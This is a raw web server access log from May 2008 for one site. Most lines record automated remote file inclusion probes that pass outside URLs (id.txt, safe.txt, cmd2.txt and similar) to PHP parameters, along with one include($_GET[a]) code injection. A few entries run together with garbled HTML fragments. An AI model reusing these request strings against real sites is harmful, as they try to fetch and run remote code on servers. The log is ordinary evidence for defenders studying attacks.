201.21.40.235 - - [04/May/2008:11:39:28 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.36.154.122 - - [04/May/2008:11:39:40 -0700] "GET /logs/errors.php?error=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [04/May/2008:11:39:41 -0700] "GET /errors.php?error=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:39:49 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:11:39:51 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:11:39:51 -0700] "GET /modules/xfsection/modify.php?dir_module=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:11:40:11 -0700] "GET /logs/access_080309.log//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:11:40:49 -0700] "GET /logs/access_080218.log/admin/spaw/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:11:41:03 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.119.142.108 - - [04/May/2008:11:42:03 -0700] "GET /logs/errors.php?error=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.119.142.108 - - [04/May/2008:11:42:03 -0700] "GET /errors.php?error=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.129.208.30 - - [04/May/2008:11:42:13 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
78.129.208.30 - - [04/May/2008:11:42:18 -0700] "GET /logs/access_080202.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:42:43 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:11:42:57 -0700] "GET /logs/access_080218.log//components/com_minibb.php?absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:11:43:12 -0700] "GET /logs/footer.inc.php?settings[footer]=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.56.79 - - [04/May/2008:11:43:16 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:11:43:18 -0700] "GET /footer.inc.php?settings[footer]=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:11:43:40 -0700] "GET /logs/footer.inc.php?settings[footer]=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:11:43:41 -0700] "GET /footer.inc.php?settings[footer]=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:11:44:41 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 45991 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:11:44:45 -0700] "GET /////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
141.201.80.161 - - [04/May/2008:11:46:51 -0700] "GET /logs/access_080218.log/components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:47:10 -0700] "GET /logs/access.log/index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:47:10 -0700] "GET /logs/index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:11:47:20 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:47:24 -0700] "GET /logs/access_080225.log/index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:47:30 -0700] "GET /logs/access.log/index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:47:30 -0700] "GET /logs/index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:47:45 -0700] "GET /logs/access_080225.log/index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:48:05 -0700] "GET /logs/access_080218.log/index.php?pagina=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:48:10 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:48:16 -0700] "GET /index.php?pagina=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:48:17 -0700] "GET /logs/index.php?pagina=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:48:37 -0700] "GET /logs/classes/templater/templater.class.php?classes_dir=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:48:37 -0700] "GET /classes/templater/templater.class.php?classes_dir=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:11:50:27 -0700] "GET //photoalb/lib/static/header.php?set_menu=http://cinta.sitesled.com/batam/cream/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:11:50:27 -0700] "GET /logs//photoalb/lib/static/header.php?set_menu=http://cinta.sitesled.com/batam/cream/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:52:05 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:52:06 -0700] "GET //codebb/lang_select?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:52:06 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:52:36 -0700] "GET /logs/access_080312.log//alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:52:37 -0700] "GET //alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:52:42 -0700] "GET /logs//alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:11:53:15 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:11:53:15 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:11:53:15 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:11:53:15 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:11:53:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:11:53:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.231.120.104 - - [04/May/2008:11:53:22 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.141.165 - - [04/May/2008:11:53:22 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
81.169.141.165 - - [04/May/2008:11:53:23 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.156.192.5 - - [04/May/2008:11:53:53 -0700] "GET /logs//photoalb/lib/static/header.php?set_menu=http://aceperform.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.156.192.5 - - [04/May/2008:11:53:53 -0700] "GET //photoalb/lib/static/header.php?set_menu=http://aceperform.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.226.248.111 - - [04/May/2008:11:54:21 -0700] "GET /logs/index.php?go=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.226.248.111 - - [04/May/2008:11:54:23 -0700] "GET /index.php?go=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.39.30 - - [04/May/2008:11:54:25 -0700] "GET /logs/errors.php?error=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [04/May/2008:11:54:26 -0700] "GET /errors.php?error=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:55:16 -0700] "GET /logs/access_080309.log/index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:55:16 -0700] "GET /logs/index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:55:18 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:55:55 -0700] "GET /logs/access_080219.log/index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.111.210 - - [04/May/2008:11:56:19 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.deadword.we.bs/attack.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:56:56 -0700] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "dmulk.com"
64.34.124.100 - - [04/May/2008:11:56:56 -0700] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "dmulk.com"
195.70.35.179 - - [04/May/2008:11:57:20 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:58:20 -0700] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:58:20 -0700] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:11:58:22 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:11:58:28 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:11:58:28 -0700] "GET /skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:11:58:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.deadword.we.bs/safe.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
213.226.248.111 - - [04/May/2008:11:59:08 -0700] "GET /logs/index.php?file=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.226.248.111 - - [04/May/2008:11:59:11 -0700] "GET /index.php?file=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.197.30.62 - - [04/May/2008:11:59:29 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.pnp21.co.kr/bbs/data/osrunkv9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.131.61 - - [04/May/2008:11:59:35 -0700] "GET //browse.php/header.php?prefix=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.145.85 - - [04/May/2008:11:59:46 -0700] "GET /logs//browse.php/header.php?prefix=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.25.145.85 - - [04/May/2008:11:59:47 -0700] "GET //browse.php/header.php?prefix=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.197.30.62 - - [04/May/2008:12:00:28 -0700] "GET /logs/access_071224.log/span%3Espanclass=rgy%3E/span%3Ebr%3Ebr%3Ebrclass='lb'%3Eaclass='res'href='http:/av.rds.yahoo.com/_ylt=A0geumEV9R1I.REBOSZjNaMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=12bssblf2/EXP=1210009237/**http%3a/www.boscarol.com/stats/webalizer/url_200710.html'%3Eboscarol.com-Ottobre2007-URL/a%3Ebr%3Espanclass=s%3E...stats/webalizer/componentswbr%3E/b%3Ecom_simpleboard/b%3E/image_uploadwbr%3E.php690.01%230.00...b%3Ecom_simpleboard/b%3E/image_uploadwbr%3E.php660.01%1780.00%/nina/html/album...br%3E/span%3Espanclass=ngrn%3Ewww.boscarol.com/stats/webalizer/url_200710.html/span%3Espanclass=rgy%3E/span%3Ebr%3Ebr%3Ebrclass='lb'%3Eaclass='res'href='http:/av.rds.yahoo.com/_ylt=A0geumEV9R1I.REBOiZjNaMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=12h5dac2p/EXP=1210009237/**http%3a/us.z.webhosting.yahoo.com/gb/view%3fmember=mosteyeknow'%3EYahoo!SmallBusiness-WebHosting/a%3Ebr%3Espancquynhthi1/us1:75.30.184.213.197.30.62 - - [04/May/2008:12:00:28 -0700] "GET /logs/access_071224.log/span%3Espanclass=rgy%3E/span%3Ebr%3Ebr%3Ebrclass='lb'%3Eaclass='res'href='http:/av.rds.yahoo.com/_ylt=A0geumEV9R1I.REBOSZjNaMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=12bssblf2/EXP=1210009237/**http%3a/www.boscarol.com/stats/webalizer/url_200710.html'%3Eboscarol.com-Ottobre2007-URL/a%3Ebr%3Espanclass=s%3E...stats/webalizer/componentswbr%3E/b%3Ecom_simpleboard/b%3E/image_uploadwbr%3E.php690.01%230.00...b%3Ecom_simpleboard/b%3E/image_uploadwbr%3E.php660.01%1780.00%/nina/html/album...br%3E/span%3Espanclass=ngrn%3Ewww.boscarol.com/stats/webalizer/url_200710.html/span%3Espanclass=rgy%3E/span%3Ebr%3Ebr%3Ebrclass='lb'%3Eaclass='res'href='http:/av.rds.yahoo.com/_ylt=A0geumEV9R1I.REBOiZjNaMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=12h5dac2p/EXP=1210009237/**http%3a/us.z.webhosting.yahoo.com/gb/view%3fmember=mosteyeknow'%3EYahoo!SmallBusiness-WebHosting//components/codemejico71007/us1:68.225213.197.30.62 - - [04/May/2008:12:00:28 -0700] "GET /logs/access_071224.log/span%3Espanclass=rgy%3E/span%3Ebr%3Ebr%3Ebrclass='lb'%3Eaclass='res'href='http:/av.rds.yahoo.com/_ylt=A0geumEV9R1I.REBOSZjNaMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=12bssblf2/EXP=1210009237/**http%3a/www.boscarol.com/stats/webalizer/url_200710.html'%3Eboscarol.com-Ottobre2007-URL/a%3Ebr%3Espanclass=s%3E...stats/webalizer/componentswbr%3E/b%3Ecom_simpleboard/b%3E/image_uploadwbr%3E.php690.01%230.00...b%3Ecom_simpleboard/b%3E/image_uploadwbr%3E.php660.01%1780.00%/nina/html/album...br%3E/span%3Espanclass=ngrn%3Ewww.boscarol.com/stats/webalizer/url_200710.html/span%3Espanclass=rgy%3E/span%3Ebr%3Ebr%3Ebrclass='lb'%3Eaclass='res'href='http:/av.rds.yahoo.com/_ylt=A0geumEV9R1I.REBOiZjNaMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=12h5dac2p/EXP=1210009237/**http%3a/us.z.webhosting.yahoo.com/gb/view%3fmember=mosteyeknow'%3EYahoo!SmallBusiness-WebHosting/a%3Ebr%3Espancsuzcudd/us1:72.80.8.208
213.197.30.62 - - [04/May/2008:12:00:29 -0700] "GET /logs/access_071224.log/span%3Espanclass=rgy%3E/span%3Ebr%3Ebr%3Ebrclass='lb'%3Eaclass='res'href='http:/av.rds.yahoo.com/_ylt=A0geumEV9R1I.REBOSZjNaMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=12bssblf2/EXP=1210009237/**http%3a/www.boscarol.com/stats/webalizer/url_200710.html'%3Eboscarol.com-Ottobre2007-URL/a%3Ebr%3Espanclass=s%3E...stats/webalizer/componentswbr%3E/b%3Ecom_simpleboard/b%3E/image_uploadwbr%3E.php690.01%230.00...b%3Ecom_simpleboard/b%3E/image_uploadwbr%3E.php660.01%1780.00%/nina/html/album...br%3E/span%3Espanclass=ngrn%3Ewww.boscarol.com/stats/webalizer/url_200710.html/span%3Espanclass=rgy%3E/span%3Ebr%3Ebr%3Ebrclass='lb'%3Eaclass='res'href='http:/av.rds.yahoo.com/_ylt=A0geumEV9R1I.REBOiZjNaMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=12h5dac2p/EXP=1210009237/**http%3a/us.z.webhosting.yahoo.com/gb/view%3fmember=mosteyeknow'%3EYahoo!SmallBusiness-WebHosting/a%3Ebr%3Espanclingeriestoreusa/us2:64.83.175.248.213 - - [04/May/2008:12:00:49 -0700] "GET /logs/index.php?redir=http://haddembr.site88.net/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:00:55 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.deadword.we.bs/safe.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:00:58 -0700] "GET /index.php?redir=http://haddembr.site88.net/on.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:00:59 -0700] "GET /logs/index.php?redir=http://haddembr.site88.net/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:01:04 -0700] "GET /index.php?redir=http://haddembr.site88.net/on.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:01:30 -0700] "GET /logs/index.php?redir=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:01:35 -0700] "GET /index.php?redir=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.111.210 - - [04/May/2008:12:02:00 -0700] "GET //index.php?meio=http://www.deadword.we.bs/attack.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:02:17 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:02:21 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:02:22 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.151.217.136 - - [04/May/2008:12:03:11 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:12:03:34 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:12:04:08 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [04/May/2008:12:04:09 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
